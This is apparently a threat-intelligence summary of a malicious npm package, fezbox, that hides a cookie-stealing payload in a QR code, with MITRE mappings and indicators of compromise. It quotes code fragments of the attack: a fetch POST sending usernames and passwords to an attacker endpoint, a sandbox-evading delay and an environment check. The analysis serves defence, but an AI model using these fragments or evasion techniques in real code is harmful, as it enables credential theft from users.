A malicious npm package named fezbox (author npm alias janedu, email janedu0216@gmail[.]com) used multiple obfuscation layers—including a reversed URL, a QR code containing executable JavaScript, and string obfuscation—to steal username and password values from browser cookies and exfiltrate them to https://my-nest-app-production[.]up[.]railway[.]app/users. Socket identified the package as malicious, flagged it in their scanner, and has petitioned npm for removal while the package remains live. #fezbox #janedu #res.cloudinary.com #my-nest-app-production.up.railway.app
Keypoints
- Threat actor published a malicious npm package named fezbox (npm alias janedu; registration email janedu0216@gmail[.]com) that appears to be a utility library but contains hidden malicious behavior.
- The package contains client-side browser code that, after delays and environment checks, fetches and parses a QR code hosted on Cloudinary and executes the code embedded in that QR image.
- The QR-embedded payload reads document.cookie to extract username and password (the latter obfuscated as a reversed string) and POSTs them to https://my-nest-app-production[.]up[.]railway[.]app/users if both are present.
- Multiple obfuscation layers are used: reversed strings, a QR code steganographic payload, and additional string/character obfuscation in the executed JavaScript to evade static analysis.
- Stealth techniques include environment checks (isDevelopment) and probabilistic execution (2/3 chance to avoid running), plus a 120-second delay to evade sandbox/analysis environments.
- Socket’s tooling detected the malicious behavior (fezbox flagged as known malware) and their team has requested npm remove the package and suspend the threat actor.
- Socket recommends using dependency-scanning tools (Socket GitHub App, CLI, browser extension, and MCP) to detect such obfuscated or suspicious packages before they enter projects.
MITRE Techniques
- [T1195.002] Supply Chain Compromise – Package published to npm that delivers malicious code as a dependency: “discovered a malicious package, fezbox…the malicious package remains live on npm.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – Malicious behavior is implemented and executed in browser-side JavaScript: “malware is written to run on the browser client side.”
- [T1105] Ingress Tool Transfer – Loader fetches and parses remote content (QR image) and retrieves executable code from a remote URL: “parseQRCodeFromUrl(…).loader.executeCode(t).”
- [T1539] Steal Web Session Cookie – Code reads document.cookie to extract credentials: “it reads a cookie from document.cookie…gets the username and password.”
- [T1567] Exfiltration Over Web Service – Exfiltrates stolen credentials via HTTPS POST to a remote endpoint: “await fetch(‘https://my-nest-app-production[.]up[.]railway[.]app/users’, … JSON.stringify({ ‘username’:…, ‘password’:… }))”
- [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTPS POST requests to send data to attacker-controlled endpoint: “await fetch(‘https://my-nest-app-production…/users’, { ‘method’: ‘POST’, … })”
- [T1001.002] Data Obfuscation: Steganography – Executes code hidden inside a QR code image as a steganographic carrier: “the payload contained within this QR code…loader.parseQRCodeFromUrl(…).loader.executeCode(t)”
- [T1027] Obfuscated Files or Information – Multiple layers of string and code obfuscation (reversed strings, escaped characters, minified/obfuscated payload): “reversed string…obfuscated payload…document[‘u0063u006Fu006Fu006Bu0069u0065’]”
- [T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion – Implements a 120-second delay before executing payload to evade short-lived analysis environments: “setTimeout(async () => { … }, 120 * 1e3);”
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – Checks for development or non-production environments and uses probabilistic execution to avoid running in analysis: “if (n.isDevelopment() || c.chance(2 / 3)) return; …”
Indicators of Compromise
- [Malicious Package] npm package name and author – fezbox (npm alias janedu), registration email janedu0216@gmail[.]com
- [C2 / Payload Host] QR image URL on Cloudinary – https://res[.]cloudinary[.]com/dhuenbqsq/image/upload/v1755767716/b52c81c176720f07f702218b1bdc7eff_h7f6pn.jpg
- [Exfiltration Endpoint] Attacker-controlled web endpoint – https://my-nest-app-production[.]up[.]railway[.]app/users
- [Obfuscated Payload] Embedded JavaScript inside QR code – contains document.cookie access and POST of credentials (examples shown in article), and additional obfuscation like reversed strings and unicode escapes